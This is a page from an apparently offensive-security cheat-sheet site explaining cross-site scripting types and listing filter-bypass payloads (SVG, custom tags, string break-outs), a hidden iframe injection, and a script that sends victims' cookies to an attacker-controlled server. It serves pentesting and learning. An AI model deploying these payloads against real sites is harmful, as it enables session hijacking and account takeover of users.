d4Rk's 1337 h4x0r guide
  • Introduction
  • Reconnaissance
    • Recon
    • OSINT
  • Enumeration
    • Network discovery
    • Port scanning
    • Webserver scanning
    • Exploit detection
    • Fuzzing
    • Process monitoring
  • Exploitation
    • Shells
      • Shells
      • TTY
    • Passwords
      • Hashcat
      • John the Ripper (JTR)
      • Hydra
      • Passwords & credentials
    • Web
      • SQL injection (SQLi)
      • Cross site scripting (XSS)
      • File inclusions (LFI, RFI)
      • Directory traversal
      • Cross site request forgery (CSRF)
      • XML external entity (XXE)
      • Cross origin resource sharing (CORS)
      • Server-side request forgery (SSRF)
      • Server-side template injection (SSTI)
      • Access control vulnerabilities
      • Authentication vulnerabilities
      • JWT attacks
      • File uploads
      • Host header attacks
      • Clickjacking
      • Logic flaws
      • OS command injection
      • HTTP Request smuggling
      • Insecure deserialization
      • DOM-based
      • WebSockets
      • Web cache poisoning
    • Buffer overflow
      • General
      • Linux
      • Windows
    • Misc
      • Evasion
      • SQSH
  • Privilege escalation
    • Linux
      • Overview
    • Windows
      • Overview
      • Mimikatz
      • PowerSploit
      • Juicy Potato, Rotten Potato (NG)
      • JAWS
      • Empire
      • SILENTTRINITY
  • Post exploitation
    • Loot
    • Pivoting
    • Standalone Tools
  • Services
    • TCP
      • TCP 21: FTP
      • TCP 22: SSH
      • TCP 23: Telnet
      • TCP 25, 587: SMTP
      • TCP 53: DNS
      • TCP 80, 443: HTTP(S)
      • TCP 88: Kerberos
      • TCP 110, 995: POP3(S)
      • TCP 111: rpcbind
      • TCP 135: MSRPC
      • TCP 139, 445: NetBIOS, SMB
      • TCP 143, 993: IMAP(S)
      • TCP 389, 636, 3268, 3269: LDAP
      • TCP 1433, UDP 1434: MSSQL Server
      • TCP 2049: NFS
      • TCP 3306: MySQL
      • TCP 3389: RDP
      • TCP 5985: WinRM
      • TCP 6379: Redis
      • TCP 27017: MongoDB
    • UDP
      • UDP 137, 138, TCP 139: NetBIOS
      • UDP 161: SNMP
    • Misc
      • Active Directoy
      • Apache Tomcat
      • Drupal
      • H2 Databases
      • IIS
      • IPsec
      • IRC
      • Java Applets
      • Java RMI
      • Jenkins
      • Joomla
      • Oracle
      • PHP
      • SharePoint
      • WordPress
  • File transfer
    • Overview
    • Wget
    • Pure-FTPd
    • TFTP
    • VBScript: Wget clone
  • Misc
    • Bash
    • Burp Suite
    • Crypto
    • Ebowla
    • Firefox extensions
    • Impacket
    • Memory forensics
    • Metasploit Framework (MSF)
    • MITM
    • Msfvenom
    • Pass the Hash (PTH)
    • PowerShell
    • PowerShell on Linux
    • Wireshark
    • Wordlists and dictionaries
  • Bug Bounty
    • Platforms
    • Tools
Powered by GitBook
On this page
  • Types of XSS
  • Reflected (non-persistent)
  • Stored (persistent)
  • DOM-based (client-side code)
  • Blind
  • Bypass WAF
  • Tags and events
  • Custom tag
  • SVG tag
  • Break out JS string
  • HTML encoding
  • Template literals
  • Polyglots
  • Iframe injection
  • Stealing cookies & sessions
  • BeEF
Edit on GitHub
  1. Exploitation
  2. Web

Cross site scripting (XSS)

PreviousSQL injection (SQLi)NextFile inclusions (LFI, RFI)

Last updated 2 years ago

Cross-site scripting is a type of computer security vulnerability typically found in web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.

--

Types of XSS

Reflected (non-persistent)

Javascript code sent in a request, e.g. via query parameters or form data, is reflected in the response.

E.g.:

https://domain.com/?error=<script>alert(1)</script>

To exploit victims you need an external delivery mechanism, like email, a tweet or other message.

Stored (persistent)

Javascript code gets stored on the server and displayed in an unsafe way to other users.

Entry points:

  • URL query string

  • Message body

  • Request headers

  • Any out-of-band routes

Exit points:

  • All possible HTTP responses

-> Try to find links between entry and exit points.

E.g.: Use <script>alert(1)</script> as username, in a comment post, etc.

Via img: <img src="." onerror="alert('test');" /> Via url: <a href="javascript:alert('test')>test</a>

As your payload is stored on the server, you don't an external delivery mechanism (as for reflected XSS), therefore stored XSS is generally considered a more severe vulnerability.

DOM-based (client-side code)

Attacker gets control over Javascript variables that are written to the DOM or used in methods like eval() or innerHTML.

HTML sinks

Place random alphanumeric strings into the source (e.g. location.search) and inspect the DOM using a browsers developer tools.

JS sinks

Using the browsers developer tools you can inspect and follow your input through the JavaScript code and check if/how it is sent to a sink.

jQuery

Sinks:

  • attr()

  • $()

AngularJS

Check for ng-app attribute, then use {{...}} to inject JavaScript.

Blind

Similar to "Stored", but you won't see the output/impact directly. E.g.

  • Submitting a contact form containing XSS

Bypass WAF

Tags and events

Custom tag

Trigger XSS using custom html tags.

<bla id=blub onfocus=alert(1) tabindex=1>#blub

SVG tag

Using animation and onbegin event:

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><rect><animateTransform onbegin="alert(1)" /></rect></svg>

Using svg animate tag to set the href attribute for anchor tag:

<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click me!</text></a></svg>

Break out JS string

E.g. using:

'-alert(1)-'
';alert(1)//'

HTML encoding

Single quote, get's decoded first and then executed when used in event handlers like onclick.

&apos;

Template literals

Templates literals are encapsulated in backticks and ${...} syntax can be used to evaluate JavaScipt inside them.

document.getElementById('message').innerText = `user controllable data`; // inject e.g. ${alert(1)}

Polyglots

Iframe injection

<iframe src="http://10.11.0.5/report" height="0" width="0"></iframe>

Stealing cookies & sessions

Let the user request an image from your server and send his cookie as a GET param.

<script>
new Image().src="https://<your-server>?cookie="+document.cookie;
</script> 

BeEF

Start ./beef Username: beef Password: beef

See also .

Use "Copy tags to clipboard" and "Copy events to clipboard" from to detect unfiltered tags and events (e.g. using Burp Intruder).

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Wikipedia
XSS Filter Evasion Cheat Sheet - OWASP
PayloadsAllTheThings/XSS Injection at master · swisskyrepo/PayloadsAllTheThings · GitHub
GitHub - mandatoryprogrammer/xsshunter: The XSS Hunter service - a portable version of XSSHunter.com
PortSwigger Cheat Sheet
XSSMap
PortSwigger - Web Security Academy - Which sinks can lead to DOM-XSS vulnerabilities?
PortSwigger - XSS Cheat Sheet
Xss JaVaSCRipt PoLYglOTs
BeEF - The Browser Exploitation Framework Project